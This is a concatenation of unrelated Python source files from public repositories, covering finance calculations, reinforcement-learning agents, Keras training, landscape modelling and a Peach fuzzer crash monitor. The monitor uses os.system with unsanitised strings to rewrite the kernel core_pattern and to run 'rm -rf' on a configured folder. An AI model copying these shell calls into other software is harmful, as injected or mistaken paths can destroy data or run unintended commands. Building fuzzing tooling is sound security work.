downpayment_percent = 0.05
elif buyer_dsr.home_price > 500000 and buyer_dsr.home_price <= 1000000:
downpayment_percent = 0.1
else:
downpayment_percent = 0.2
except Exception:
return None
#loan = self.max_dp() / downpayment_percent
loan = buyer_dsr.downpayment / downpayment_percent
return loan
def min_dp(buyer_dsr, pri = False):
"""
Compares the Gross Debt Service and Total Debt Service results and returns the smaller of the two as the effective minimum downpayment
Return
------
float
minimum downpayment
"""
return min(buyer_dsr.gds(prin = pri), buyer_dsr.tds(prin = pri))
# %%
#buyer_dsr = debtServiceRatio(75000, 3600, 2400, 3600, 3000, 30000, 200000)
# %%
#mortgage_max(buyer_dsr)
# %%
#min_dp(buyer_dsr, pri = True)
# %%
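# A worked example using the commented-out inputs above (income=75000,
# property_tax=3600, heat_cost=2400, car_payment=3600, credit_card_payment=3000,
# downpayment=30000, home_price=200000), following the formulas in gds()/tds():
#   GDS: 0.32 * 75000 = 24000 annual spend; 24000 - 3600 - 2400 = 18000 max annual
#        mortgage payment, i.e. 1500 per month.
#   TDS: 0.40 * 75000 = 30000 annual spend; 30000 - 3600 - 2400 - 3600 - 3000 = 17400
#        max annual mortgage payment, i.e. 1450 per month.
#   The proposed downpayment (30000) exceeds both caps, so gds() returns 18000,
#   tds() returns 17400, and min_dp() yields 17400.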
| 2.140625
| 2
|
44.py
|
lycantropos/Project-Euler
| 0
|
12783456
|
from itertools import count
from utils import pentagonal
def pentagonal_number(index: int) -> int:
return index * (3 * index - 1) // 2
# TODO: improve this "bruteforcefully" working function
def pentagonal_numbers(offset: int) -> int:
for j in count(1):
p_j = pentagonal_number(j)
for s in range(j + 1, j + offset):
p_s = pentagonal_number(s)
p_k = p_s - p_j
p_d = p_k - p_j
if pentagonal(p_k) and pentagonal(p_d):
break
else:
continue
return p_k - p_j
assert pentagonal_numbers(offset=10_000) == 5_482_660
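# The pentagonal membership test imported from utils is not shown here. A typical
# implementation (an assumption for illustration, not the project's actual code)
# inverts the index formula x = k * (3k - 1) / 2, i.e. k = (1 + sqrt(24x + 1)) / 6,
# and checks that k is a positive integer (math.isqrt requires Python 3.8+):
#
# import math
# def is_pentagonal(x: int) -> bool:
#     root = math.isqrt(24 * x + 1)
#     return root * root == 24 * x + 1 and (1 + root) % 6 == 0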
| 3.40625
| 3
|
retropie/get_files.py
|
dmsun/Arch-Linux-Config
| 0
|
12783457
|
<reponame>dmsun/Arch-Linux-Config
#!/usr/bin/env python
import os
# change the directory to the rom hub
os.chdir("/home/pi/RetroPie/roms")
extensions = ['.srm', '.eep', '.state', '.hi', '.hs', '.fs', '.dat', '.cfg', '.nv']
def get_files(directory=None):
    # resolve the default at call time rather than at definition time
    if directory is None:
        directory = os.getcwd()
with open("/home/pi/backup_files.txt", 'w') as test:
for root, dir, files in os.walk(directory):
for name in files:
if name.endswith(tuple(extensions)):
test.write(os.path.join(root, name))
test.write("\n")
| 2.671875
| 3
|
Problem Set 3 - Student Version/reinforcement_learning.py
|
MuhammeedAlaa/MI-Assignemnets
| 0
|
12783458
|
<filename>Problem Set 3 - Student Version/reinforcement_learning.py
from typing import Callable, DefaultDict, Dict, Generic, List, Optional, Union
from agents import Agent
from environment import Environment, S, A
from helpers.mt19937 import RandomGenerator
from helpers.utils import NotImplemented
import json
from collections import defaultdict
# The base class for all Reinforcement Learning Agents required for this problem set
class RLAgent(Agent[S, A]):
rng: RandomGenerator # A random number generator used for exploration
actions: List[A] # A list of all actions that the environment accepts
discount_factor: float # The discount factor "gamma"
epsilon: float # The exploration probability for epsilon-greedy
learning_rate: float # The learning rate "alpha"
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__()
self.rng = RandomGenerator(seed) # initialize the random generator with a seed for reproducibility
self.actions = actions
self.discount_factor = discount_factor
self.epsilon = epsilon
self.learning_rate = learning_rate
# A virtual function that returns the Q-value for a specific state and action
# This should be overridden by the derived RL agents
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return 0
# Returns true if we should explore (rather than exploit)
def should_explore(self) -> bool:
return self.rng.float() < self.epsilon
def act(self, env: Environment[S, A], observation: S, training: bool = False) -> A:
actions = env.actions()
if training and self.should_explore():
#return the action with index self.rng.int(0, len(actions) - 1)
return actions[self.rng.int(0, len(actions) - 1)]
else:
# if more than one action has the maximum q-value, return the one that appears first in the "actions" list
#get the max action
max_action = actions[0]
max_q = self.compute_q(env, observation, actions[0])
for action in actions:
q = self.compute_q(env, observation, action)
# for all actions check if it has a q value bigger than the max and update max
if q > max_q:
max_q = q
max_action = action
#return max action
return max_action
#############################
####### SARSA ######
#############################
# This is a class for a generic SARSA agent
class SARSALearningAgent(RLAgent[S, A]):
Q: DefaultDict[str, DefaultDict[str, float]] # The table of the Q values
# The first key is the string representation of the state
# The second key is the string representation of the action
# The value is the Q-value of the given state and action
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
self.Q = defaultdict(lambda:defaultdict(lambda:0)) # The default Q value is 0
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return self.Q[str(state)][str(action)] # Return the Q-value of the given state and action
# NOTE: we cast the state and the action to a string before querying the dictionaries
# Update the value of Q(state, action) using this transition via the SARSA update rule
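# i.e. Q(s, a) <- Q(s, a) + alpha * [r + gamma * Q(s', a') - Q(s, a)],
# with alpha the learning rate and gamma the discount factor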
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, next_action: Optional[A]):
# update the Q(state, action) with the equation in instructions
self.Q[state.__str__()][action.__str__()] += self.learning_rate * (reward + self.discount_factor *
self.Q[next_state.__str__()][next_action.__str__()] - self.Q[state.__str__()][action.__str__()])
# Save the Q-table to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.Q, f, indent=2, sort_keys=True)
# load the Q-table from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.Q = json.load(f)
#############################
##### Q-Learning ######
#############################
# This is a class for a generic Q-learning agent
class QLearningAgent(RLAgent[S, A]):
Q: DefaultDict[str, DefaultDict[str, float]] # The table of the Q values
# The first key is the string representation of the state
# The second key is the string representation of the action
# The value is the Q-value of the given state and action
def __init__(self,
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
self.Q = defaultdict(lambda:defaultdict(lambda:0)) # The default Q value is 0
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
return self.Q[str(state)][str(action)] # Return the Q-value of the given state and action
# NOTE: we cast the state and the action to a string before querying the dictionaries
# Given a state, compute and return the utility of the state using the function "compute_q"
def compute_utility(self, env: Environment[S, A], state: S) -> float:
# get all actions
actions = env.actions()
#get max q
max_q = self.compute_q(env, state, actions[0])
for action in actions:
q = self.compute_q(env, state, action)
# for all actions check if it has a q value bigger than the max and update max
if q > max_q:
max_q = q
#return q max
return max_q
# Update the value of Q(state, action) using this transition via the Q-Learning update rule
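# i.e. Q(s, a) <- Q(s, a) + alpha * [r + gamma * max_a' Q(s', a') - Q(s, a)],
# where the max over next-state actions is what compute_utility returns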
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, done: bool):
# If done is True, then next_state is a terminal state in which case, we consider the Q-value of next_state to be 0
if done:
q_next = 0
else:
q_next = self.compute_utility(env, next_state)
#update Q(state, action) with the equation in instructions
self.Q[state.__str__()][action.__str__()] += self.learning_rate * (reward + self.discount_factor *
q_next - self.Q[state.__str__()][action.__str__()])
# Save the Q-table to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.Q, f, indent=2, sort_keys=True)
# load the Q-table from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.Q = json.load(f)
#########################################
##### Approximate Q-Learning ######
#########################################
# The type definition for a set of features representing a state
# The key is the feature name and the value is the feature value
Features = Dict[str, float]
# This class takes a state and returns a set of features
class FeatureExtractor(Generic[S, A]):
# Returns a list of feature names.
# This will be used by the Approximate Q-Learning agent to initialize its weights dictionary.
@property
def feature_names(self) -> List[str]:
return []
# Given an environment and an observation (a state), return a set of features that represent the given state
def extract_features(self, env: Environment[S, A], state: S) -> Features:
return {}
# This is a class for a generic Q-learning agent
class ApproximateQLearningAgent(RLAgent[S, A]):
weights: Dict[str, Features] # The weights dictionary for this agent.
# The first key is action and the second key is the feature name
# The value is the weight
feature_extractor: FeatureExtractor[S, A] # The feature extractor used to extract the features corresponding to a state
def __init__(self,
feature_extractor: FeatureExtractor[S, A],
actions: List[A],
discount_factor: float = 0.99,
epsilon: float = 0.5,
learning_rate: float = 0.01,
seed: Optional[int] = None) -> None:
super().__init__(actions, discount_factor, epsilon, learning_rate, seed)
feature_names = feature_extractor.feature_names
self.weights = {str(action):{feature: 0 for feature in feature_names} for action in actions} # we initialize the weights to 0
self.feature_extractor = feature_extractor
# Given the features of state and an action, compute and return the Q value
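# i.e. Q(s, a) = sum_k w[a][k] * f_k(s), a linear function of the extracted features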
def __compute_q_from_features(self, features: Dict[str, float], action: A) -> float:
q = 0
# for all features, apply the equation from the instructions to get the q value
for k in features.keys():
q += self.weights[action.__str__()][k] * features[k]
return q
def compute_q(self, env: Environment[S, A], state: S, action: A) -> float:
features = self.feature_extractor.extract_features(env, state)
return self.__compute_q_from_features(features, action)
def update(self, env: Environment[S, A], state: S, action: A, reward: float, next_state: S, done: bool):
# If done is True, then next_state is a terminal state in which case, we consider the Q-value of next_state to be 0
if done:
q_next = 0
else:
# compute the q_max for the next state
actions = env.actions()
q_next = self.compute_q(env, next_state, actions[0])
for next_action in actions:
q = self.compute_q(
env, next_state, next_action)
# for all actions check if it has a q value bigger than the max and update max
if q_next < q:
q_next = q
# copy the weights so we don't affect them while updating
weights = self.weights.copy()
# get state features
features = self.feature_extractor.extract_features(env, state)
q = self.compute_q(env, state, action)
# update the weights in temp dictionary
for k in features.keys():
weights[action.__str__()][k] += self.learning_rate * (reward + self.discount_factor * q_next - q) * features[k]
# set the weights to the temp dictionary
self.weights = weights.copy()
# Save the weights to a json file
def save(self, file_path: str):
with open(file_path, 'w') as f:
json.dump(self.weights, f, indent=2, sort_keys=True)
# load the weights from a json file
def load(self, file_path: str):
with open(file_path, 'r') as f:
self.weights = json.load(f)
| 2.90625
| 3
|
utils.py
|
DandelionLau/NetworkCollections
| 8
|
12783459
|
<reponame>DandelionLau/NetworkCollections
"""
@FileName: utils.py
@Description: Implement utils
@Author : Ryuk
@CreateDate: 2019/12/26 9:28
@LastEditTime: 2019/12/26 9:28
@LastEditors: Ryuk
@Version: v0.1
"""
import torch

def getLayers(model):
"""
get each layer's name and its module
:param model:
:return: each layer's name and its module
"""
layers = []
def unfoldLayer(model):
"""
unfold each layer
:param model: the given model or a single layer
:return:
"""
# get all layers of the model
layer_list = list(model.named_children())
for item in layer_list:
module = item[1]
sublayer = list(module.named_children())
sublayer_num = len(sublayer)
# if the current layer has no sublayers, it is a leaf module: collect it
if sublayer_num == 0:
layers.append(module)
# if current layer contains sublayers, unfold them
elif isinstance(module, torch.nn.Module):
unfoldLayer(module)
unfoldLayer(model)
return layers
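# A minimal usage sketch (illustration only, not part of the original module):
# flatten a small nested torch.nn model into its leaf layers.
if __name__ == "__main__":
    import torch.nn as nn
    model = nn.Sequential(nn.Linear(10, 5), nn.Sequential(nn.ReLU(), nn.Linear(5, 1)))
    for layer in getLayers(model):
        print(layer)  # prints the Linear, ReLU, Linear leaf modules one per line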
| 2.578125
| 3
|
back-end/api/migrations/0009_auto_20161114_0228.py
|
tuftsjumbocode/bostonathleticsassociation
| 2
|
12783460
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-14 02:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0008_merge_20161114_0228'),
]
operations = [
migrations.AlterField(
model_name='volunteer',
name='email',
field=models.CharField(max_length=50),
),
migrations.AlterField(
model_name='volunteer',
name='jacket',
field=models.CharField(max_length=30),
),
migrations.AlterField(
model_name='volunteer',
name='years_of_service',
field=models.CharField(max_length=3),
),
]
| 1.59375
| 2
|
tests/test_functions.py
|
enceladus-rex/chainer-transformer
| 0
|
12783461
|
from chainer_transformer.functions import generate_positional_encodings
import pytest
def test_generate_positional_encoding():
start = 0
end = 100
dim = 256
l = end - start
output = generate_positional_encodings(start, end, dim)
assert output.shape == (l, dim)
| 2.234375
| 2
|
python/gpu-enabled-multiprocessing.py
|
GangababuManam/tensorflow-101
| 832
|
12783462
|
<reponame>GangababuManam/tensorflow-101<gh_stars>100-1000
import pandas as pd
import multiprocessing
from multiprocessing import Pool
def train(index, df):
import tensorflow as tf
import keras
from keras.models import Sequential
from keras.layers import Dense, Activation
#------------------------------
#this block enables GPU enabled multiprocessing
core_config = tf.ConfigProto()
core_config.gpu_options.allow_growth = True
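# (allow_growth lets each worker process claim GPU memory on demand instead of
# reserving the whole device up front, so several processes can share one GPU)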
session = tf.Session(config=core_config)
keras.backend.set_session(session)
#------------------------------
#prepare input and output values
df = df.drop(columns=['index'])
data = df.drop(columns=['target']).values
target = df['target']
#------------------------------
model = Sequential()
model.add(Dense(5 #num of hidden units
, input_shape=(data.shape[1],))) #num of features in input layer
model.add(Activation('sigmoid'))
model.add(Dense(1))#number of nodes in output layer
model.add(Activation('sigmoid'))
model.compile(loss='mse', optimizer=keras.optimizers.Adam())
#------------------------------
model.fit(data, target, epochs = 5000, verbose = 1)
model.save("model_for_%s.hdf5" % index)
#------------------------------
#finally, close sessions
session.close()
keras.backend.clear_session()
#-----------------------------
#main program
multiprocessing.set_start_method('spawn', force=True)
df = pd.read_csv("dataset.csv")
my_tuple = [(i, df[df['index'] == i]) for i in range(0, 20)]
with Pool(10) as pool:
pool.starmap(train, my_tuple)
| 2.875
| 3
|
scuole/campuses/views.py
|
texastribune/scuole
| 1
|
12783463
|
<filename>scuole/campuses/views.py
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from django.shortcuts import get_object_or_404
from django.views.generic import DetailView
from scuole.counties.models import County, CountyCohorts
from scuole.districts.models import District, DistrictStats
from scuole.regions.models import RegionCohorts
from scuole.states.models import StateStats
from scuole.stats.models import SchoolYear
from .models import Campus, CampusStats
class CampusDetailView(DetailView):
county_cohorts_model = CountyCohorts
region_cohorts_model = RegionCohorts
def get_object(self):
return get_object_or_404(
Campus.objects.prefetch_related("principals"),
slug=self.kwargs["slug"],
district__slug=self.kwargs["district_slug"],
)
def get_context_data(self, **kwargs):
context = super(CampusDetailView, self).get_context_data(**kwargs)
county_cohorts = self.county_cohorts_model.objects.filter(
county=self.object.county
)
region_cohorts = self.region_cohorts_model.objects.filter(
region=self.object.district.region
)
# year = self.kwargs["campus_year"]
# if year:
# context["stat"] = get_object_or_404(
# CampusStats, year__name=year, campus=self.object
# )
# context["district"] = get_object_or_404(
# DistrictStats, year__name=year, district=self.object.district
# )
# context["state"] = get_object_or_404(
# StateStats, year__name=year, state__name="TX"
# )
# else:
latest_year = SchoolYear.objects.first()
context["stat"] = get_object_or_404(
CampusStats, year=latest_year, campus=self.object
)
context["district"] = get_object_or_404(
DistrictStats, year=latest_year, district=self.object.district
)
context["state"] = get_object_or_404(
StateStats, year=latest_year, state__name="TX"
)
context["latest_county_cohort"] = county_cohorts.latest_cohort(
county=self.object.county
)
context["latest_region_cohort"] = region_cohorts.latest_cohort(
region=self.object.district.region
)
return context
| 2.046875
| 2
|
LEM_scripts_1.py
|
DavidLitwin/SpectralDiffusion
| 2
|
12783464
|
<reponame>DavidLitwin/SpectralDiffusion
# -*- coding: utf-8 -*-
"""
Created on Wed May 1 09:38:14 2019
@author: dgbli
Run spectral diffuser in a landscape evolution model. This code does not account
for a difference in boundary conditions between the diffusion model (periodic)
and the FastscapeEroder (fixed gradient). This is the reason why the tiled approach
that appears in Flat_torus_LEM was used.
"""
import numpy as np
import matplotlib.pyplot as plt
import pickle
import LEMFunctions as lf
from landlab.components import LinearDiffuser, FlowAccumulator, FastscapeEroder
from landlab.plot import imshow_grid
from landlab import RasterModelGrid, CLOSED_BOUNDARY, FIXED_VALUE_BOUNDARY
from matplotlib.pyplot import figure, show, plot, xlabel, ylabel, title
TicToc = lf.TicTocGenerator()
#%% Run with landlab diffusion
np.random.seed(3)
Nx = 100
Ny = 100
dx = 10
mg = RasterModelGrid((Nx,Ny), dx)
z = mg.add_zeros('topographic__elevation', at='node' )
#mg.core_nodes['topographic__elevation'] = np.random.rand(mg.number_of_core_nodes)
mg.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
z_array = z.reshape((mg.shape))
z_init = np.zeros(mg.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z[:] = z_init
imshow_grid(mg,'topographic__elevation')
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
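# The FastscapeEroder below implements detachment-limited stream power erosion,
# E = K * A**m * S**n, with drainage area A (from the FlowAccumulator) and slope S.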
ld = LinearDiffuser(mg,linear_diffusivity=D)
fr = FlowAccumulator(mg,'topographic__elevation',flow_director='D8')
sp = FastscapeEroder(mg,K_sp = K,m_sp = m, n_sp=n)
lf.tic()
for i in range(nt):
fr.run_one_step()
sp.run_one_step(dt)
ld.run_one_step(dt)
mg.at_node['topographic__elevation'][mg.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg,'topographic__elevation')
z_array_landlab = z.reshape((mg.shape))
pickle.dump(z_array_landlab, open("Landlab_test2.p","wb"))
#%% Run with my explicit finite difference diffuser
mg1 = RasterModelGrid((Nx,Ny), dx)
z1 = mg1.add_zeros('topographic__elevation', at='node' )
mg1.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
np.random.seed(3)
z_array = z1.reshape((mg1.shape))
z_init = np.zeros(mg1.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z1[:] = z_init #z is tied to the RasterModelGrid mg1
fr1 = FlowAccumulator(mg1,'topographic__elevation',flow_director='D8')
sp1 = FastscapeEroder(mg1,K_sp = K,m_sp = m, n_sp=n)
lf.tic()
for i in range(nt):
fr1.run_one_step()
sp1.run_one_step(dt)
z_array = z1.reshape((mg1.shape))
z_new = lf.Explicit_Diffuser_one_step(z_array,D,dt,dx,dx)
z_new = z_new.reshape((np.size(z_new)))
z1[:] = z_new
mg1.at_node['topographic__elevation'][mg1.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg1,'topographic__elevation')
z_array_explicit = z1.reshape((mg.shape))
pickle.dump(z_array_explicit, open("Landlab_explicit_test1.p","wb"))
#%% Run with full spectral diffuser
mg2 = RasterModelGrid((Nx,Ny), dx)
z2 = mg2.add_zeros('topographic__elevation', at='node' )
mg2.set_status_at_node_on_edges(right=FIXED_VALUE_BOUNDARY, top=FIXED_VALUE_BOUNDARY,left=FIXED_VALUE_BOUNDARY,bottom=FIXED_VALUE_BOUNDARY)
dt = 50
T_max = 1E5
nt = int(T_max//dt)
D = 1E-4
uplift_rate = 1E-3 #m/yr
uplift_per_step = uplift_rate*dt
m = 0.5 #Exponent on A []
n = 1.0 #Exponent on S []
K = 1E-11*(365*24*3600) #erosivity coefficient [yr−1]
np.random.seed(3)
z_array = z2.reshape((mg2.shape))
z_init = np.zeros(mg2.shape)
z_init[1:-1,1:-1] = np.random.rand(np.shape(z_array[1:-1,1:-1])[0],np.shape(z_array[1:-1,1:-1])[1])
z_init = z_init.reshape((np.size(z_init)))
z2[:] = z_init #z is tied to the RasterModelGrid mg2
fr1 = FlowAccumulator(mg2,'topographic__elevation',flow_director='D8')
sp1 = FastscapeEroder(mg2,K_sp = K,m_sp = m, n_sp=n)
A = lf.Spectral_Diffuser(z_array,D,dt,dx,dx,'explicit')
lf.tic()
for i in range(nt):
fr1.run_one_step()
sp1.run_one_step(dt)
z_array = z2.reshape((mg2.shape))
z_new = lf.Full_Spectral_Diffuser_one_step(z_array,A)
z_new = z_new.reshape((np.size(z_new)))
z2[:] = z_new
mg2.at_node['topographic__elevation'][mg2.core_nodes] += uplift_per_step
if i % 20 == 0:
print ('Completed loop %d' % i)
lf.toc()
imshow_grid(mg2,'topographic__elevation')
z_array = z2.reshape((mg.shape))
pickle.dump(z_array, open("Landlab_full_spectral_test1.p","wb"))
#%%
z_array_spectral = pickle.load(open("Landlab_full_spectral_test1.p","rb"))
z_diff = z_array_landlab - z_array_spectral
plt.imshow(z_diff)
| 2.109375
| 2
|
Peach/Agent/linux.py
|
aleasims/Peach
| 0
|
12783465
|
<reponame>aleasims/Peach
#
# Copyright (c) <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Authors:
# <NAME> (<EMAIL>)
# $Id: peach.py 1986 2010-03-05 07:19:57Z meddingt $
import struct, sys, time
from Peach.agent import Monitor
import os, re, pickle
class LinuxApport(Monitor):
'''
Monitor crash reporter for log files.
TODO - Monitor syslog for crash event, then wait for report
'''
def __init__(self, args):
'''
Constructor. Arguments are supplied via the Peach XML
file.
@type args: Dictionary
@param args: Dictionary of parameters
'''
if args.has_key('Executable'):
self.Executable = str(args['Executable']).replace("'''", "")
else:
self.Executable = None
if args.has_key('LogFolder'):
self.logFolder = str(args['LogFolder']).replace("'''", "")
else:
self.logFolder = "/var/crash/"
if not args.has_key('PeachApport'):
raise PeachException("Error, LinuxApport monitor requires the PeachApport parameter providing full path to \"peach-apport\" program.")
self.PeachApport = str(args['PeachApport']).replace("'''", "")
# Our name for this monitor
self._name = "LinuxApport"
self.data = None
self.startingFiles = None
os.system('echo "|' + self.PeachApport +' %p %s %c" > /proc/sys/kernel/core_pattern')
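# (a leading "|" in core_pattern makes the kernel pipe core dumps to the named
# program; per core(5), %p is the crashing PID, %s the signal number and %c the
# core size soft limit)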
os.system('rm -rf ' + self.logFolder + '/*')
def OnTestStarting(self):
'''
Called right before start of test case or variation
'''
# Monitor folder
self.startingFiles = os.listdir(self.logFolder)
def OnTestFinished(self):
'''
Called right after a test case or variation
'''
pass
def GetMonitorData(self):
'''
Get any monitored data from a test case.
'''
if self.data == None:
return None
return {"LinuxApport-Crash.txt":self.data}
def DetectedFault(self):
'''
Check if a fault was detected.
'''
try:
# Give crash reporter time to find the crash
time.sleep(0.25)
time.sleep(0.25)
self.data = None
for f in os.listdir(self.logFolder):
if not f in self.startingFiles and (self.Executable == None or f.find(self.Executable) > -1):
fd = open(os.path.join(self.logFolder, f), "rb")
self.data = fd.read()
fd.close()
os.unlink(os.path.join(self.logFolder, f))
return True
return False
except:
print sys.exc_info()
return False
def OnFault(self):
'''
Called when a fault was detected.
'''
pass
def OnShutdown(self):
'''
Called when Agent is shutting down, typically at end
of a test run or when a Stop-Run occurs
'''
# Stop calling our script
os.system('echo "" > /proc/sys/kernel/core_pattern')
def StopRun(self):
'''
Return True to force test run to fail. This
should return True if an unrecoverable error
occurs.
'''
return False
def PublisherCall(self, method):
'''
Called when a call action is being performed. Call
actions are used to launch programs; this gives the
monitor a chance to determine whether it should run
the program under a debugger instead.
Note: This is a bit of a hack to get this working
'''
pass
# end
| 1.914063
| 2
|
tests/unit/utils/test_context_processors.py
|
etienne86/oc_p13_team_spirit
| 0
|
12783466
|
<reponame>etienne86/oc_p13_team_spirit
"""
This module contains the unit tests related to
the context processors in app ``utils``.
"""
# from django.test import TestCase
| 1.304688
| 1
|
reviewboard/reviews/tests/test_template_tags.py
|
davidt/reviewboard
| 1
|
12783467
|
<reponame>davidt/reviewboard
from __future__ import unicode_literals
from django.contrib.auth.models import User
from django.template import Context, Template
from django.test.client import RequestFactory
from django.utils import six
from reviewboard.accounts.models import Profile
from reviewboard.testing import TestCase
class IfNeatNumberTagTests(TestCase):
"""Unit tests for {% ifneatnumber %} template tag."""
def test_milestones(self):
"""Testing the ifneatnumber tag with milestone numbers"""
self.assertNeatNumberResult(100, '')
self.assertNeatNumberResult(1000, 'milestone')
self.assertNeatNumberResult(10000, 'milestone')
self.assertNeatNumberResult(20000, 'milestone')
self.assertNeatNumberResult(20001, '')
def test_palindrome(self):
"""Testing the ifneatnumber tag with palindrome numbers"""
self.assertNeatNumberResult(101, '')
self.assertNeatNumberResult(1001, 'palindrome')
self.assertNeatNumberResult(12321, 'palindrome')
self.assertNeatNumberResult(20902, 'palindrome')
self.assertNeatNumberResult(912219, 'palindrome')
self.assertNeatNumberResult(912218, '')
def assertNeatNumberResult(self, rid, expected):
t = Template(
'{% load reviewtags %}'
'{% ifneatnumber ' + six.text_type(rid) + ' %}'
'{% if milestone %}milestone{% else %}'
'{% if palindrome %}palindrome{% endif %}{% endif %}'
'{% endifneatnumber %}')
self.assertEqual(t.render(Context({})), expected)
class MarkdownTemplateTagsTests(TestCase):
"""Unit tests for Markdown-related template tags."""
def setUp(self):
super(MarkdownTemplateTagsTests, self).setUp()
self.user = User.objects.create_user('test', '<EMAIL>')
Profile.objects.create(user=self.user, default_use_rich_text=False)
request_factory = RequestFactory()
request = request_factory.get('/')
request.user = self.user
self.context = Context({
'request': request,
})
def test_normalize_text_for_edit_escape_html(self):
"""Testing {% normalize_text_for_edit %} escaping for HTML"""
t = Template(
"{% load reviewtags %}"
"{% normalize_text_for_edit '<foo **bar**' True %}")
self.assertEqual(t.render(self.context), '&lt;foo **bar**')
def test_normalize_text_for_edit_escaping_js(self):
"""Testing {% normalize_text_for_edit %} escaping for JavaScript"""
t = Template(
"{% load reviewtags %}"
"{% normalize_text_for_edit '<foo **bar**' True True %}")
self.assertEqual(t.render(self.context),
'\\u0026lt\\u003Bfoo **bar**')
| 2.28125
| 2
|
flan/flanintegration.py
|
bretlowery/flan
| 3
|
12783468
|
from abc import ABCMeta, abstractmethod
try:
from flan import istruthy, error, info
except:
from flan.flan import istruthy, error, info
pass
import settings
import os
import threading
import _thread as thread
def _timeout(exportname):
error('Flan->%s import timed out' % exportname)
thread.interrupt_main() # raises KeyboardInterrupt
def timeout_after(s):
"""
Use as decorator to exit process if function takes longer than s seconds
"""
def outer(fn):
def inner(*args, **kwargs):
x = fn
timer = threading.Timer(s, _timeout, args=[fn.__module__])
timer.start()
try:
result = fn(*args, **kwargs)
finally:
timer.cancel()
return result
return inner
return outer
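# Illustrative usage sketch for the decorator above (added; not part of the
# original module): wrap a slow export hook so the process is interrupted when
# it exceeds its time budget. `export_batch` and `rows` are hypothetical names.
#
#   @timeout_after(30)
#   def export_batch(rows):
#       ...  # push rows to the downstream integration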
class FlanIntegration:
__metaclass__ = ABCMeta
def __init__(self, name, meta, config):
self.name = name
self.meta = meta
        self.config = config
self.loglevel = None
self.haltonerror = None
self.version = settings.__VERSION__
def logerr(self, err):
if self.loglevel == "errors" or self.haltonerror:
error('Flan->%s exports failed: %s' % (self.name, err))
if self.haltonerror:
os._exit(1)
return
def loginfo(self, msg):
if self.loglevel == "info":
info(msg)
return
@staticmethod
def istruthy(val):
return istruthy(val)
def _getsetting(self, name, erroronnone=True, checkenv=False, defaultvalue=None):
val = defaultvalue
try:
if checkenv:
val = os.environ[name.upper()]
except KeyError:
pass
if not val:
ln = name.lower()
if ln in self.config:
val = self.config[ln]
if not val and erroronnone:
self.logerr('Flan->%s config failed: no %s defined in the environment or passed to Flan.' % (self.name, name))
return val
| 2.53125
| 3
|
logs/plot.py
|
xinyandai/distributed-compressed-sgd
| 3
|
12783469
|
<reponame>xinyandai/distributed-compressed-sgd
import matplotlib.pyplot as plt
import numpy as np
fontsize=44
ticksize=40
legendsize=30
plt.style.use('seaborn-white')
plt.figure(figsize=(12.8, 9.25))
def read_csv(file_name):
return np.genfromtxt(fname=file_name, delimiter=',', skip_header=1)
def _plot_setting():
